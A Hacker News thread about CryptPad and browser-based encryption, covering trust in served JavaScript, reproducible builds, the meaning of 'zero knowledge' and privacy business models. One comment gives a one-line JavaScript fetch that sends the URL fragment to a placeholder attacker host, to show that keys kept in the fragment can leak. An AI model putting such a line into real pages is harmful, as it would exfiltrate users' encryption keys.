Time to Encrypt the Cloud (cryptpad.fr)
160 points by dansup_ on Feb 21, 2017 | 101 comments



The problem with in-the-browser encryption is that it is fundamentally insecure until websites can be made immutable. You're executing remote, mutable code to handle your secret data, which means that at any point the website operator could replace it with something that exfiltrates the data the moment you access it.

Even if the operator is not malicious, they could receive a court order, or the connection loading the code could be MITMed even when you think you're secure [0].

[0] https://medium.com/@karthikb351/airtel-is-sniffing-and-censo...


It's a bit harder to exploit, but this is also a problem with mobile apps. The developer could be compelled to release an update that leaks data to a third party for specific users. Even for open-source projects there's no guarantee that the published version of the app matches anything in the commit history. And I doubt anybody looks inside the binaries that get published to the app stores when there's source code available.

So right now on web or mobile you simply have to trust the app developers.

Apple & Google could easily fix this by copying the Docker registry: just run the build process themselves, directly from a specified git SHA, then publish the result and name the repo and git SHA they used for the build. That way security researchers could go read the source code and know that it's the actual code running on everyone's phones.

Mind you, doing this would make it easier for the US government to compel Apple or Google to modify a binary for just one user. But Apple and Google can already do that if they want to.

Another approach would be to make the whole toolchain build reproducible binaries, so a researcher can run the build process themselves and verify the binary hashes match.
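The verification step itself is trivial once builds are reproducible; a minimal sketch in TypeScript (Node.js), where the file paths are hypothetical:

  // verify-build.ts: compare a locally reproduced build against the published binary
  import { createHash } from "crypto";
  import { readFileSync } from "fs";

  function sha256(path: string): string {
    return createHash("sha256").update(readFileSync(path)).digest("hex");
  }

  const local = sha256("./my-build/app.apk");       // built yourself from the git SHA
  const published = sha256("./downloaded/app.apk"); // fetched from the app store

  console.log(local === published
    ? "OK: the published binary matches the source"
    : "MISMATCH: the published binary was not built from this source");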

But let's not pretend that apps are somehow more secure because you download a sandboxed app from an app store instead of sandboxed JS + HTML. The tech stacks used to deploy code are more similar than they are different.


> Even for open-source projects there's no guarantee that the published version of the app matches anything in the commit history.

But at least for open source, if you are willing, you can build your own binary, using your own tools, from the source in the commit history, and get an app that matches it [1].

[1] Exclusive of the issues detailed in "Reflections on Trusting Trust" by Ken Thompson regarding the actual build tools themselves (https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...)


F-Droid does the builds itself!


The Airtel story is interesting. I've experienced this in India, but it's usually just DNS-level blocks. I didn't expect it to manifest as an HTTPS MITM. That's a massive fail on Cloudflare's part.


That was entirely The Pirate Bay's fault, not CloudFlare's.


I mean, it's deceptive to the general public to even call it Flexible SSL and offer it as a product. A false sense of security is worse than no security.


Subresource integrity [1] helps make sure that the JavaScript referred to by the page is really what gets served. The common use case discussed is ensuring that a compromised CDN can't attack big chunks of the internet.

The page itself can still be modified, but there are mitigations that can be performed if you're paranoid enough.

1. https://developer.mozilla.org/en-US/docs/Web/Security/Subres...
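Generating the integrity value is a one-liner; for example (a sketch using Node.js, with a hypothetical file and CDN URL):

  // sri-hash.ts: compute the value for a <script integrity="..."> attribute
  import { createHash } from "crypto";
  import { readFileSync } from "fs";

  const digest = createHash("sha384")
    .update(readFileSync("./vendor/crypto-lib.js"))
    .digest("base64");
  console.log(`sha384-${digest}`);
  // Then reference the file as:
  // <script src="https://cdn.example.com/crypto-lib.js"
  //         integrity="sha384-..." crossorigin="anonymous"></script>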


The threat model I stated included the future compromise of the second party (the host). SRI only helps against untrustworthy third parties (CDNs), so it does not really address the issue.


I've been thinking about this problem for Airborn OS. In my opinion, the best place to put signatures of the "main resource" would be the website's certificate. [1]

I created a Firefox extension that can check signatures both in the certificate and (for the time being) hardcoded in the extension. [2]

[1]: http://blog.airbornos.com/post/2015/04/25/Secure-Delivery-of...

[2]: http://blog.airbornos.com/post/2016/02/23/The-first-web-appl...


Well, if you trust the website at least once, it can install a service worker that verifies signatures on any app/script updates, from any party, before allowing them to replace the locally cached version of the script.
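Roughly like this; a hedged sketch that pins a hash rather than checking a full signature (signature checking would use crypto.subtle.verify instead), with the pinned digest and script name as placeholders:

  // sw.ts: refuse to serve an updated app.js unless its digest matches the pin
  const PINNED_SHA256 = "9f86d081884c7d65..."; // hex digest of the trusted app.js

  async function sha256Hex(buf: ArrayBuffer): Promise<string> {
    const d = await crypto.subtle.digest("SHA-256", buf);
    return [...new Uint8Array(d)].map(b => b.toString(16).padStart(2, "0")).join("");
  }

  self.addEventListener("fetch", (event: any) => {
    if (!event.request.url.endsWith("/app.js")) return;
    event.respondWith((async () => {
      const res = await fetch(event.request);
      const body = await res.arrayBuffer();
      if (await sha256Hex(body) !== PINNED_SHA256) {
        return new Response("app.js changed unexpectedly", { status: 502 });
      }
      return new Response(body, { headers: res.headers });
    })());
  });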


Service workers can get wiped on hard refreshes or due to space constraints. And they are not easily transferred to new devices, unlike packaged applications. They're not a security mechanism.

And it does not necessarily address compromise of the host either, since an attacker who controls the host may also have access to the signing keys, especially in the case of a court order.

That effectively is a silent, user-targetable auto-update of software to which you entrust your secret data.

Auto-updates for crypto software should be verifiable through other channels, require user confirmation and use a distribution method that is difficult to scope to a single user to make targeted attacks harder.


Trusting someone to honestly serve you a piece of html is an easier thing to develop and check. You can always save a copy of it to your machine and check it and run it from there.

It's true that these are not great against a state-level actor deliberately targeting an individual (but then, not much is), but in a lot of situations I would, e.g., trust GitHub to serve me unmodified HTML and S3 to store my encrypted data, where I might not have trusted a single entity to provide me with an integrated solution.

It would be great, though, if a page could indicate that it is sensitive, so that if the browser sees it change, it pops up a message on the client giving the user a fingerprint and notifying them of the change.


If I publish my application on GitHub, how can you know for sure I didn't make changes on the server side? The appearance looks the same, which is why SRI only solves front-end trust; the service as a whole remains a black box. That's what the previous OP meant.


Depends on the app. If you are making a storage app, then you can do client-side encryption so that it doesn't matter if S3 is compromised: they don't have access to your data.

SRI means you don't have to worry about your JS getting modified, so all that's left is the HTML. My claim is that there are lots of situations where I can trust something to serve HTML honestly enough for my use.

It is possible that my bias for web apps that connect to real services (of the sort a desktop app might use), rather than acting as a thin veneer over a black-box service, gives us different perspectives.

But I do ultimately agree that some support for enhancing trust in the initial html document should be built into browsers. I guess such a thing should involve being able to get a hash of the actually downloaded and running code and document and being able to postpone an update until I've had the opportunity to check it's legitimate.


Immutability isn't a great option for obvious reasons.

Trackability would be nice, though. Imagine if web data served off a domain could be dug through like a git repo: you could see every commit and diff, and proof of malice would be indisputable. Then, even if bad people did take over the domain, it would be detected immediately, and its reputation rating would drop so low that browsers would refuse to connect to it.


Well, take CryptPad. The link could define the version of the code, and the browser could enforce that it never changes. Everything else is communication with the server, something you can audit, given never-changing code. Bugfixes are of course prevented, but that just means you need to bake in a "check for updates" link; there's no reason that URL needs to change, just the contents at it, which you don't need to trust the way you trust the pad's source.

How to achieve this, no idea. Or, several ideas, but nothing general enough ¯\_(ツ)_/¯


What happens if, say, you Torify the code element? Such that it's not possible to identify a specific user by name?

Or have some, say, third-party hash proof of the download? (Essentially signed downloads.)

Or if the system is blind to the identity of the user requesting information? Reads need not be authenticated, only writes, which would have to match some signature, say.

(I'm aware of numerous browser problems, I'm looking at ways around them.)


It's not about being immutable, but about verified and signed builds (see codehash.db).


Even if that is done, the app itself has to be verified to be free of security vulnerabilities, because if data can trigger code execution, you're done. And it's much easier for the web service itself to manipulate its own data than for other parties trying to exploit an XSS vulnerability.

In other words, you must ensure that the frontend treats the entire backend as a hostile actor, not just the code it serves, but also the data.

Not all web frontends are written like that; many serve HTML snippets that get pasted into the DOM unchecked, instead of passing JSON data and rendering it on the client side. You can sign the static frontend code all you want, and in that case you're still owned by the service itself.
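A minimal illustration of the difference, with a hypothetical Note type; rendering server data as text keeps a hostile backend from injecting script, while pasting snippets does not:

  type Note = { title: string; body: string };

  function render(note: Note, root: HTMLElement) {
    const h = document.createElement("h2");
    h.textContent = note.title;   // safe: treated as plain text, never parsed
    const p = document.createElement("p");
    p.textContent = note.body;
    root.append(h, p);
  }

  // The pattern warned about above: if the server is hostile, this is game over.
  // root.innerHTML = htmlSnippetFromServer;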



No, that is just a hint for caching. Caches naturally evict entries and eventually reload the content.

For security you don't need an immutability hint, you need it enforced.


IPFS is the way to go.


There's nothing Zero Knowledge about this.

I'm starting to think that SpiderOak has destroyed the meaning of the term. Apparently "zero knowledge" now means E2E.


I definitely think that cryptpad.fr doesn't know the meaning.

Keybase's entire purpose is to make a public database of people. They know who you are, therefore, they have some knowledge.

Not that complicated. If you store user profile data and therefore link the data they store to that profile, it is not zero knowledge.

Arguably, if you have to charge money for a service, you might need a way to do that, but then you're not zero knowledge. Or you just charge a flat rate with unlimited use of whatever your service provides.

I don't think it makes a lot of sense to trust a company that claims to be secure when they don't understand even the terminology, let alone the complexities, of providing security and privacy.


Before SpiderOak started (ab)using the term in this way, the password manager Clipperz did as well. However, they saw the error of their ways and switched from "zero-knowledge web apps" to "host-proof web apps," which is arguably a better concept. Unfortunately, it never caught on and seems to have died out as Clipperz stopped being actively developed.

SpiderOak has also dropped the term and now goes with "no knowledge."

https://clipperz.is/about/#why-web-cryptography-does-matter

https://en.wikipedia.org/wiki/SpiderOak#History


If the system relies on user Peggy demonstrating to service Victor that Peggy knows the keys that decrypt or access information, then the system approaches the traditional meaning of "zero knowledge". (Peggy being Prover and Victor being Verifier; see the ZKP Wikipedia page.)

If the system can work without Victor knowing anything else about Peggy, e.g., taking the question "who are you" entirely out of the equation, well, then we've got an interesting situation.


If Alice can share notes with Bob in a manner where the service itself cannot determine that Alice and Bob have any connection at all, then go ahead and market that as Zero Knowledge. If the service can determine who is talking to whom, through either passive or active means, then it is disingenuous to claim the service is Zero Knowledge.

Unless the anonymity set is very small or bandwidth is infinite, accomplishing metadata privacy requires some kind of zero knowledge proof.

I don't think such systems necessarily require E2E encryption. If the term zero knowledge continues to be misused, it's going to cause more confusion later when services get around to protecting metadata.


Fair points. I've misused the term myself (in ignorance), and can see how this could easily get transformed by a nonexpert public.


Any time anyone misuses "zero knowledge", please direct them to this page: https://paragonie.com/blog/2016/08/crypto-misnomers-zero-kno...


Isn't zero-knowledge a subset of end-to-end (where both ends are you)?


No, it's not.


Well, who decides what it is? When security words go marketing, it's pointless to argue. Zero knowledge is yet another "military grade" buzzword.


You're right that marketing can sometimes make what was once black into white, but that doesn't make it true.

A phrase like "military grade" is now and always was a meaningless, nonsense phrase used to suggest robustness. No military has actually defined any "grade" of encryption to measure against. It's like saying that your ladies' deodorant is "Strong Enough For a Man". Sure, whatever.

End to end encryption (E2E) on the other hand means something specific: The secrets critical to the security of the system live on the end user devices. If a standard webmail service claims to be E2E, it's not marketing, it's lying.

Likewise, zero knowledge has a well-defined meaning. It's a protocol where a Prover convinces a Verifier that it has some information, without actually revealing what that information is. For example, Peggy could have a set of public keys whose order she has randomly shuffled. She can prove to Victor that the output of her shuffle is a valid permutation of the keys, without revealing to Victor what order they were in before she shuffled them.

Zero knowledge protocols are useful building blocks for such tasks as:

- Mixing messages in a way that prevents a global passive adversary who also maliciously runs some of the routers in a network from learning the social graph of users (Tor cannot do this, because it is not zero knowledge)

- Verifiable secret ballots. Voting systems where you receive proof that your ballot was cast as you intended, but you can't use the proof to convince anyone else. (To mitigate vote buying/voter intimidation)

- Offering a database where users can query information, but the database operators cannot know what records have been requested

If a product doesn't provide such features, or doesn't make use of a zero knowledge proof, then calling it zero knowledge is nothing more than a brazen lie.
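To make the Prover/Verifier dance concrete, here is a toy Schnorr identification protocol, a much simpler cousin of the verifiable shuffle above (demo-sized numbers, TypeScript with BigInt; real deployments use ~256-bit groups and a secure RNG):

  // Peggy proves she knows x with y = g^x mod p, revealing nothing about x.
  const p = 2039n, q = 1019n, g = 4n; // g generates the subgroup of prime order q

  function modPow(base: bigint, exp: bigint, mod: bigint): bigint {
    let r = 1n;
    base %= mod;
    while (exp > 0n) {
      if (exp & 1n) r = (r * base) % mod;
      base = (base * base) % mod;
      exp >>= 1n;
    }
    return r;
  }

  const rand = (n: bigint) => BigInt(Math.floor(Math.random() * Number(n))); // toy RNG only

  const x = rand(q);           // Peggy's secret
  const y = modPow(g, x, p);   // her public key

  const r = rand(q);
  const t = modPow(g, r, p);   // Peggy -> Victor: commitment
  const c = rand(q);           // Victor -> Peggy: random challenge
  const s = (r + c * x) % q;   // Peggy -> Victor: response

  // Victor checks g^s == t * y^c (mod p). The transcript (t, c, s) could be
  // simulated without knowing x, which is why he learns zero knowledge of it.
  console.log(modPow(g, s, p) === (t * modPow(y, c, p)) % p ? "accepted" : "rejected");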


> The secrets critical to the security of the system live on the end user devices

OK, so my desktop is device #1 and my mobile is #2. I encrypt a note on the desktop, then "query information, but the database operators cannot know what records have been requested" with device #2. It seems this concept fits the end-to-end definition you gave?

I really think both terms are so vague that they can be bent until they look interchangeable. And there's nothing wrong with that.


They are two very different things.

E2E is a term that dictates that when I send information, only the intended recipient can decrypt it, under the assumption that the keys are safe.

A zero-knowledge proof is a construct where I can prove something to you without leaking any other information. For instance, you want to buy a house, but before the seller signs, he wants proof that you can actually pay x $ in down payment. Traditionally you would go down to your bank and get a piece of paper stating that you have x $ locked and usable only for this purchase for the next 60 days. It doesn't say how much you have in your account, where the money is from, or anything else. A zero-knowledge proof is the same, just digital.

E2E would not help here, because it doesn't prove anything; it's just a term about the communication being safe.


I know what you mean: ZK as in password auth. Then why was encrypted storage called zero knowledge in the first place? A complete misuse of the term.


Not really. My example could just as well be done with any public-key crypto system. If you want better examples, see this MathOverflow post: https://mathoverflow.net/questions/22624/example-of-a-good-z...

But the misuse of the term is most likely just because they didn't understand it in the first place. It is well defined, but rather abstract.


Because if you encrypt data before uploading it to a server, the server has no (zero) knowledge about what that data is?



They're not mutually exclusive terms; you can have one without the other. The database that supports zero-knowledge queries can be a plaintext patent database. You can do research without leaking what you're researching, but the records themselves are not confidential between a sender and recipient, so it would be wrong to claim such a system is E2E, even though it is zero knowledge.

Take your example: you upload 10 notes to a server with device #1 and then retrieve a few of them with device #2. The server knows exactly which 10 notes you uploaded and exactly which 3 of the 10 were read by the second device. It also knows when the uploads and downloads occur. Since it knows #2 downloaded a subset of what #1 uploaded, it can conclude that #1 and #2 have some kind of relationship (e.g., both are your devices, or one device belongs to your friend with whom you have shared 3 of your notes). This is E2E but not zero knowledge.

Now imagine incorporating both E2E and zero-knowledge techniques into a note-sync system:

1) All notes are encrypted end to end. That is, the servers that store and route notes never learn the secrets necessary to decrypt them

2) Notes sent into the system are routed through a mixnet that uses verifiable shuffles so no one passively watching all of the users and system (or actively running malicious servers or clients) can learn who is sending which note ciphertext.

3) Note ciphertexts are retrieved from the system using private information retrieval so that observers and cheating servers don't learn who is receiving which one or when it's been received.

This system isn't going to learn anything about how many devices you have or who you share with. And it's going to prevent further metadata analysis of this sort: devices #1 and #2 keep matching sets of notes and frequently connect from the same IP addresses, therefore it's safe to assume these devices are owned by the same person. Device #3 requests a subset of notes that were uploaded by #1 and #2, but always from a different country. Now #3 retrieves a note posted by #2 from the same IP address that #1 used recently. Therefore it's safe to assume that the owner of #3 is visiting the owner of #1 and #2.


I love ansuz's and cjd's work on CryptPad! I use it daily as my personal notes wiki, synced between 3 computers, and occasionally for collaborative note-taking in video calls with ~15 people. My happiness levels have increased with every new iteration of features and fixes.

I recently suggested adding a frontend for collaborative agile retrospective boards, similar to Retrium. CryptPad seems pretty pluggable in that regard, and actually, TIL it can even edit presentation slides now :)


CryptPad is pretty solid, definitely a step up from Etherpad Lite. Curious how CryptPad's encryption could be leveraged in a replacement for uppit, as another reddit-from-source install is obviously not a great idea.


  We do this by adding a hash character (#) to a link. 
  By design, browsers don’t share anything after this 
  character.
...and I stopped reading there.

It is astonishing to read that. Just absolutely mind-blowing.

Browsers absolutely can and DO share things coming after the hash (#) character in a URL. How?

JavaScript! It's absurdly easy to siphon anchor hashes out of the address bar with JavaScript, and send them back to the mothership, or anywhere else for that matter. It's basically how oh-so-many Very Big Websites work.

Are you kidding me?!
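To be concrete, leaking the fragment takes one line of attacker-controlled script (evil.example is a placeholder):

  // Runs in the page, so it sees everything after the '#'
  fetch("https://evil.example/log?h=" + encodeURIComponent(location.hash));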


I think you're being overly obtuse. The point they're making is that browsers don't automatically send anything after the # to the server.

This makes it possible to implement apps where all decryption is done on the client and the server never sees either the plaintext or the key (which they are mistakenly calling 'Zero-Knowledge' apps).

Whether this is beneficial, and how easy it is to bypass (court order to modify the JavaScript, MITM to modify the JavaScript, extensions which dial in to the mothership with all URLs including the hash fragment), is another question.

But if you assume that your browser or that app are compromised and arbitrary scripts are running in it, then the attacker already has access to all the data anyway, and the location hash itself becomes irrelevant.

They don't claim it's a silver bullet, but they rightly claim that this at least has the benefit of protecting your data in case someone leaks or subpoenas it from the servers hosting it.

Many web apps successfully use this model, most notably client-encrypted pastebin clones like privnote and password managers like KeePassWeb and LastPass.
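The client-side half of that model is small. A hedged sketch with the Web Crypto API, key carried in the fragment (all names illustrative):

  // The key travels in '#<base64 key>', so it reaches this code but never the server.
  async function decryptFromFragment(ciphertext: ArrayBuffer, iv: Uint8Array) {
    const raw = Uint8Array.from(atob(location.hash.slice(1)), ch => ch.charCodeAt(0));
    const key = await crypto.subtle.importKey("raw", raw, "AES-GCM", false, ["decrypt"]);
    const plain = await crypto.subtle.decrypt({ name: "AES-GCM", iv }, key, ciphertext);
    return new TextDecoder().decode(plain);
  }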


It's not the browser sharing the hash content, but the JavaScript in the page. In something like this you clearly have to trust the JavaScript you download with the page each time.



Is that attack possible over HTTPS without compromising a CA, or a local hack like sslstrip? If a page is doing secret stuff over HTTP it's even more broken.


>> "The usage of HTTPS in combination with HSTS can reduce the effectiveness of QI. Also using a content delivery network (CDN) that offers low latency can make it very difficult for the QI packet to win the race with the real server."

Above is from the researchers: https://blog.fox-it.com/2015/04/20/deep-dive-into-quantum-in...


It's not clear to me how this is possible against HTTPS-only sites without forging a certificate or MITMing the connection. The new content would have to be encrypted with the correct key.

If this is indeed possible, then the internet is totally broken. "Reduce the effectiveness" implies that it is still possible, though.


Not sure it means the internet is broken, but it would mean SSL is broken.


Took the words out of my mouth. Glad to see someone else commenting on this. As soon as I saw that I was thinking..."well, gee, that seems like a terrible idea".


Not only that: there are tons of poorly coded bots that will remember and request entire URLs, complete with the hash and hash content.


There have been lots of malicious chrome extensions in the past that essentially sent all your visits (with the location hash) to a server.


People don't care about privacy in the abstract, and won't, until they are really harmed by the loss of it.

It's not only ordinary people who don't care about privacy. Even businesses who have a great deal to lose from loss of privacy, still use Slack and Gmail. (Indeed, I bet even Google competitors use Gmail).

The real angle is theft, not privacy. Companies are always stealing all of our data, which is why it's so cheap. If we took steps to protect it, serious steps that actually denied companies the knowledge that drives their growth, then we'd have gained something valuable. The unfortunate truth is that people won't protect what they've come to believe is worthless, and so it will remain worthless. A chicken-and-egg problem, to be sure.


It's kind of a Gresham's Law dynamic in that regard.

Thing is, when people do realise they care about privacy, they're going to really care about it.

https://cryptpad.fr/pad/#/1/view/+VGaPJa1oHnDhNfGTugy+Q/gTSc...


I think a world where I could use cloud services for pictures/documents/driving/social/etc. without being tracked and exploited for either profit or manipulation would be wonderful. However, what would be the economic incentive to provide such a service at Google- or Facebook-scale, free of charge (via up-front subscription fees, of course)? Is there a business model that is able to ignore the advertising and marketing value of your data, yet still provides enough value to fuel the growth that Google, Facebook, and others have experienced? Asked another way, would these cloud/social services still be able to exist as we know them if their providers were not allowed to collect and exploit this data?


Theoretically, what you are describing is Apple's iCloud business model.

But some might say that because it's not open source you can't trust them.

Personally, I trust them because of the money I give them: they promised me privacy, I pay monthly, and if I am ever betrayed I'll leave the Apple ecosystem forever and they will get less money. So they basically have no incentive to lie to me. Yes, it's all based on trust, but it always comes down to that at some point.


You may have overlooked that Apple is a hardware company; the services they offer are complementary to the hardware they sell. Their incentives follow whatever sells more hardware.

If forfeiting iCloud privacy gives them access to a billion new hardware customers (hello, China!) as iPhone sales are dwindling, do you really believe they will stick behind iCloud privacy? The point being that they may have more incentive to break their privacy promises than you think.

But still, at the moment, Apple being a hugely successful hardware company gives it fewer incentives than, say, an advertising network (hello, Google) or a "give us all your data and we'll make it available online for you, also ads" company (hello, Facebook Inc.), as its revenue depends mostly on hardware, not on ads, software licensing, or investor storytime. This may change when profits and sales go down; we have already witnessed other hardware vendors making moves such as lowering an item's sale price with a strategy of recouping the loss by exploiting/reselling user data later (hello, Samsung).


> But some might say that because it's not open source you can't trust them.

And should it not be the case? Theoretically.

As for the reasoning that they have no incentive to lie to you: the same goes for anyone, and for pretty much anything where a wrongdoing takes place that shouldn't have happened in the first place. It could be anything; going through examples would stretch this too far.

The middle ground can be an easy backup/sync/mail service that does the heavy lifting, the transport work, while we encrypt and decrypt on the client side. For example, we can't run a transportation company if all we have to do is send a few packets every month across the country or the globe. But we can have an unbreakable lock/safe/package in which we pack the stuff, where the receiver is the only person who knows how to open it. I have never really been good at analogies, but I hope you get the drift.

If only they could write an easy app that uses the service APIs, where the code for that app is open source and all it does is encryption/decryption (generally speaking) on the client machine. That's something Backblaze and CrashPlan claim to do (they are closed source, btw), and so does Tarsnap (haven't used it; too complex and pricey for my use case, and not sure if it's open source).


> Tarsnap (haven't used it; too complex and pricey for my use case, and not sure if it's open source)

FWIW, Tarsnap is not under an open source license, but you do get the client source code (and you're encouraged to audit it before compiling).


> However, what would be the economic incentive to provide such a service at Google- or Facebook-scale, free of charge (via up-front subscription fees, of course)?

I'm not quite sure what you mean by "free of charge (via up-front subscription fees, of course)" here. Do you mean an extra "free" feature on top of your paid subscription or do you mean a freemium model where everyone gets the feature but the free users are subsidized by the paid users? Or do you mean totally free?

In the first two cases, I'm afraid the answer is that the only economic incentive is people making purchasing decisions based on the feature being present. If there's no increase in demand, there's no economic reason to implement it. Unfortunately, aside from the HN crowd, not many people seem to care much about privacy.

In the last case, I think it's never going to happen. Nothing can live long without money and if your users aren't your customers, they have to be your product in order for you to survive.

> Is there a business model that is able to ignore the advertising and marketing value of your data, yet still provides enough value to fuel the growth that Google, Facebook, and others have experienced?

I think WhatsApp has demonstrated this, no? It was a paid subscription from the start and, as far as I know, the data hasn't ever really been used for marketing or advertising. It's fully encrypted now too.

> Asked another way, would these cloud/social services still be able to exist as we know them if their providers were not allowed to collect and exploit this data?

In terms of collection, some services require access to this data. For example Google can't send you a notification telling you about your flight status if it can't read your email to get your flight confirmation. It also can't recommend videos on YouTube or pay creators without access to watch histories. I also doubt that more basic products like Google Search can work as well as they do without knowing which links you're clicking to tell them how good the results are.

In terms of exploitation, I think there's definitely an argument for users paying to, for example, not be advertised to or have their data withheld from marketing exchanges, however there's no demand for it.


>I think WhatsApp has demonstrated this no? It's been a paid subscription from the start and as far as I know, the data hasn't ever really been used for marketing or advertising. It's fully encrypted now too.

No. It was bought out by Facebook Inc. in 2014.

An excerpt from WhatsApp's legal info:

If you are an existing user, you can choose not to have your WhatsApp account information shared with Facebook to improve your Facebook ads and products experiences. Existing users who accept our updated Terms and Privacy Policy will have an additional 30 days to make this choice.

But for new users, well, tough luck!

Their encryption was criticized when it was shown to be implemented in a way that allows WhatsApp to replace the key transparently, without notifying the user.

A bonus excerpt from WhatsApp's legal info:

As part of the Facebook family of companies, WhatsApp receives information from, and shares information with, this family of companies. We may use the information we receive from them, and they may use the information we share with them, to help operate, provide, improve, understand, customize, support, and market our Services and their offerings. (...) Facebook and the other companies in the Facebook family also may use information from us to improve your experiences within their services such as making product suggestions (for example, of friends or connections, or of interesting content) and showing relevant offers and ads.


> In terms of exploitation, I think there's definitely an argument for users paying to, for example, not be advertised to or have their data withheld from marketing exchanges, however there's no demand for it.

Where do you get the idea that there is no demand for this? It's a recurrent demand, and it is consistently declined for business-model reasons by the Facebook-likes (see investor storytime [1]).

Then there is a compelling argument that paying not to be advertised to is only going to make you a more valuable target to advertise to. [2]

Likely, paying to have your data withheld from marketing exchanges will increase the price of your data on the market while not providing you any way to be sure it has actually been withheld.

The only way is for this data not to be collected in the first place.

[1]: https://www.theatlantic.com/technology/archive/2014/08/adver...

[2]: http://zen.lk/2015/07/19/Why-you-will-never-escape-ads-by-pa...


I don't think it matters much what the business model is. As long as software services are provided by centralized, for-profit entities, exploitation won't stop.

A free, open source, peer to peer infrastructure is the only way out.


Why do business models not matter? Business models are expression of self-interest and self-interest always matters.

Not-for-profit organizations have self-interest too. We just don't always know what it is.

I think what we should be looking for is alignment of self-interest and where that is not possible we need good balance of power.


In my experience, the only interest of most for-profit corporations is maximizing next quarter's profits. If they can get away with raising the prices to the extremes to achieve that, they will. If they have to offer their services for free and balance that by exploiting their users' data or attention, they will. If they have to shut down some services or even "pivot" the entire company to a completely different domain, they will do that.

I don't see how any of that is aligned with the users' interest. Of course, they will also spend quite a lot on marketing, trying to make you believe the opposite.

Also, in addition to the business model, the whole entity of a for-profit corporation is rather transient. And when we're talking about an infrastructure for storing, relaying and accessing information, that's definitely not a good thing. I don't think Google, Facebook, Dropbox or GitHub will be around in a couple of decades, for political and economic reasons. It's hard enough to keep information around in the face of technological advancements (new hardware architectures, protocols, algorithms, data formats, etc.), so we really don't need these additional obstacles.


There's a new type of business model emerging, IMHO.


Can you elaborate? I'd be interested to hear more details, and I think others might be as well


Not the parent, but tech-savvy consumers are willing to pay more for a better service. If there were an email provider better than Gmail, with no spying, total transparency, etc., many here would switch in a heartbeat even if it cost $5/month.

Not sure why GP assumed this must be free of charge; tech-savvy consumers also tend to have money.

If there were a cloud provider with solid infrastructure, full transparency and insight into the network down to server cams, all based on free software, would you pay extra for it?


This is, in fact, what I did when I switched to Fastmail. Others looking for absolute security over convenience have gravitated towards ProtonMail. I also discovered other perks to having a paid email service... like getting customer support.


I'm a bit late, but sure!

Think about MSP models for a moment, and consider how they morphed into SaaS models over time. That "morphing" involved moving the data from an on-prem location to the "cloud". If you look under the hood of the infra while this was going on, you see lots of innovation occurring in networking, compute resource allocation, security, storage, etc.

Now think about SaaS moving on-prem. A company has a bunch of their own infrastructure spread across both public cloud and private cloud systems. They want some of that software to have the benefits of SaaS. They want some of that software to be as secure as running it on-prem.

If we can manage to create the right software to enable it, there will be a new business model based on running someone's SaaS software on your own machines. There needs to be a way to deploy this software, and do updates and maintenance of course, but there also needs to be a way to pay for use, updates and that maintenance.

Older models of using license keys aren't very secure and don't scale the way SaaS services do. So you might end up seeing a model like Splunk's, where usage defines license costs. Trouble is, that licensing engine is a pain in the ass for companies to maintain, and it requires what most would consider obfuscation to make it secure and guarantee payment for use.

If you add cryptocurrencies to the mix, then you have a way to implement a lightweight federation across all types of infrastructure and tie it to the deployment. I won't go too far into the details of that here, but that's what I'm working on currently, and have been working on for a while.


Encryption will only solve a portion of the problem. Google knows how old I am. They know my sex. That can be fairly accurately derived from browsing habits alone. I receive targeted ads for common health problems for people of my sex in my age group. If I ever click on one of those ads, they now 'know' that I have that condition... and consequently, now my data is worth more at the time of sale. Same for Amazon. Same for Facebook.

It's not an easily solved problem. The best solution I've seen is Tor, but then, using that will put you on several watch lists. If that is to ever change, we need something like Tor built into a browser as incognito mode to make it widely accessible.


> If I ever click on one of those ads, they now 'know' that I have that condition... and consequently, now my data is worth more at the time of sale. Same for Amazon. Same for Facebook.

> It's not an easily solved problem.

If everyone clicked on stuff they aren't interested in, that would help solve the problem.

Also try getting children to use your computer and click ads - that really confuses them. :)


> Also try getting children to use your computer and click ads - that really confuses them. :)

It confuses the children? :)


> using that will put you on several watch lists

Name one "watch list" that you get put on for using Tor. That's ridiculous. Even with Rule 41 there aren't any additional watch lists. It's this exact fear and unfounded self-censorship that destroys a society quicker than any actual oppressive regime could.



It's not clear that these are "watch lists" in the sense that the parent or grandparent poster referred to, which would probably refer to something that automatically gets the individuals on it ongoing further attention or disparate treatment by the government. We still don't really know exactly what XKS is used for; some people seem to have interpreted the "scores" that are generated as though they were akin to the Chinese social credit score scheme (something that stays with an identified individual persistently), but I haven't seen evidence that this is true. It seems to me that XKS is a language and system for defining packet capture "scores" that search and capture Internet traffic meeting certain criteria, including arbitrary analyst-defined relatively-high-level criteria. Although an analyst using XKS to spy on particular people may know or learn their identities in many ways (and something bad could happen to them as a result), I don't see an indication that XKS is, or is linked to, a database that automatically "scores" or "watchlists" people.

In a traditional "watch list", those listed can expect to automatically encounter more scrutiny or problems from government officials in some kinds of interaction, like trying to board a plane, trying to enter the country, or maybe interacting with law enforcement or trying to file taxes. The XKS rules have in common with this that some people get more and different attention than others (which I can readily agree implicates their rights), but maybe in a particular moment as part of an analyst's activity, rather than in a way associated permanently with their identities.

While I certainly don't think anyone should have the power to perform searches like these, I feel like different senses of "list" are being conflated here, especially in the grandparent post's notion of "several watchlists". (I've been a part of the Tor community for a long time and have never heard of a report of anybody receiving adverse treatment from a government that could be attributed to Tor use this way... though it's certainly plausible that Tor users do get singled out in various ways by various governments for further spying.)


The biggest problem with encrypting cloud storage by default for everyone is not technical. It's that the consequence of losing keys is 100% data loss. That is, generally speaking, not a good default design choice for average users who want to entrust, say, a lifetime of photos to the cloud.

Encrypted storage is a great tool to have, but because the consequences of losing keys are so severe it should usually be an opt-in choice where the user has to positively acknowledge the consequences of losing their key. For most consumers that's going to be for special cases.

It's probably the reason why Apple, which has been at the forefront of E2E encryption with iMessage, does not offer general E2E encryption of iCloud. It does however offer it in the form of encrypted notes in their Notes app. So you can opt in to encrypted storage of secrets, but you'll still recover your photo library if you forget your keychain password.


If Apple's primary concern for not offering iCloud zero-knowledge encryption were that people may lose their data through loss of a key, why do they offer exactly that option with their secure vault?

It is expected that encrypted data will be lost when the key is lost, security comes at the price of convenience.

I disagree that this should be an opt-in choice for an encrypted online data storage service; the whole point of it being encrypted is to make sure it cannot be accessed without the key, thus preventing the service provider from being a potential privacy-breach point. In post-Snowden times, where online privacy requires encryption, always-on encryption for a third-party data storage service makes sense and caters to the growing demand for online privacy.


> why do they offer exactly that option with their secure vault?

You mean FileVault, their disk encryption? Time Machine backups are not encrypted by default. You have to opt in.

If you mean Keychain, their password manager, that's a good example of a high-security special case. And there are usually ways of resetting lost passwords so you may still survive the loss of your Keychain key.

